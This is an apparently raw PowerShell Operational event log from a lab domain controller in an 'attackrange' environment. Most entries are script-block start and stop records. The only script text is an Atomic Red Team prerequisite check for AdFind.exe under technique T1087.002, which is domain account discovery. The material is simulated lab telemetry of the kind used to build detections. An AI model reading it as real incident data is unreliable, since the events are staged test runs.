EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478366
Keywords=None
Message=Completed invocation of ScriptBlock ID: 611a4612-f1ad-4a8f-87cf-9441e37e20e9
Runspace ID: 6892b3d0-9740-4a0c-bb11-9e3a43297d90
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478365
Keywords=None
Message=Completed invocation of ScriptBlock ID: b4f90bf5-589e-4a5d-9625-d15f2bba9e1b
Runspace ID: 6892b3d0-9740-4a0c-bb11-9e3a43297d90
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478364
Keywords=None
Message=Completed invocation of ScriptBlock ID: a130534c-74c1-4a5f-a332-1137b60c8def
Runspace ID: 6892b3d0-9740-4a0c-bb11-9e3a43297d90
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478363
Keywords=None
Message=Started invocation of ScriptBlock ID: a130534c-74c1-4a5f-a332-1137b60c8def
Runspace ID: 6892b3d0-9740-4a0c-bb11-9e3a43297d90
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478362
Keywords=None
Message=Started invocation of ScriptBlock ID: b4f90bf5-589e-4a5d-9625-d15f2bba9e1b
Runspace ID: 6892b3d0-9740-4a0c-bb11-9e3a43297d90
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478361
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{if (Test-Path C:\AtomicRedTeam\atomics\T1087.002\src\AdFind.exe) {exit 0} else {exit 1}}

ScriptBlock ID: b4f90bf5-589e-4a5d-9625-d15f2bba9e1b
Path:
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478360
Keywords=None
Message=Started invocation of ScriptBlock ID: 611a4612-f1ad-4a8f-87cf-9441e37e20e9
Runspace ID: 6892b3d0-9740-4a0c-bb11-9e3a43297d90
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478359
Keywords=None
Message=Creating Scriptblock text (1 of 1):
& {if (Test-Path C:\AtomicRedTeam\atomics\T1087.002\src\AdFind.exe) {exit 0} else {exit 1}}

ScriptBlock ID: 611a4612-f1ad-4a8f-87cf-9441e37e20e9
Path:
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1478358
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1478357
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 6772 in AppDomain: DefaultAppDomain.
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1478356
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478355
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478354
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478353
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478352
Keywords=None
Message=Started invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478351
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478350
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478349
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478348
Keywords=None
Message=Started invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478347
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478346
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478345
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478344
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478343
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478342
Keywords=None
Message=Started invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478341
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478340
Keywords=None
Message=Completed invocation of ScriptBlock ID: 93d779ef-941d-4e00-98f9-278cc93e6e44
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478339
Keywords=None
Message=Started invocation of ScriptBlock ID: 93d779ef-941d-4e00-98f9-278cc93e6e44
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478338
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478337
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478336
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4ccf8614-5388-4599-8b4a-25a5522f098f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478335
Keywords=None
Message=Completed invocation of ScriptBlock ID: 378d3c9c-7e66-4752-aa62-9136843a5efd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478334
Keywords=None
Message=Started invocation of ScriptBlock ID: 378d3c9c-7e66-4752-aa62-9136843a5efd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478333
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3e25f239-fa3d-49da-8dce-f103d67bd1b5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478332
Keywords=None
Message=Started invocation of ScriptBlock ID: 3e25f239-fa3d-49da-8dce-f103d67bd1b5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478331
Keywords=None
Message=Completed invocation of ScriptBlock ID: d9432ec7-1113-4c2e-8d79-d8f910249f08
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478330
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478329
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478328
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478327
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478326
Keywords=None
Message=Started invocation of ScriptBlock ID: d9432ec7-1113-4c2e-8d79-d8f910249f08
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478325
Keywords=None
Message=Started invocation of ScriptBlock ID: 4ccf8614-5388-4599-8b4a-25a5522f098f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478324
Keywords=None
Message=Completed invocation of ScriptBlock ID: 892cd5a7-1ed1-45c5-b2dd-9883bf181058
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478323
Keywords=None
Message=Started invocation of ScriptBlock ID: 892cd5a7-1ed1-45c5-b2dd-9883bf181058
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478322
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4ccf8614-5388-4599-8b4a-25a5522f098f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478321
Keywords=None
Message=Completed invocation of ScriptBlock ID: 378d3c9c-7e66-4752-aa62-9136843a5efd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478320
Keywords=None
Message=Started invocation of ScriptBlock ID: 378d3c9c-7e66-4752-aa62-9136843a5efd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478319
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3e25f239-fa3d-49da-8dce-f103d67bd1b5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478318
Keywords=None
Message=Started invocation of ScriptBlock ID: 3e25f239-fa3d-49da-8dce-f103d67bd1b5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478317
Keywords=None
Message=Completed invocation of ScriptBlock ID: d9432ec7-1113-4c2e-8d79-d8f910249f08
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478316
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478315
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478314
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478313
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478312
Keywords=None
Message=Started invocation of ScriptBlock ID: d9432ec7-1113-4c2e-8d79-d8f910249f08
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478311
Keywords=None
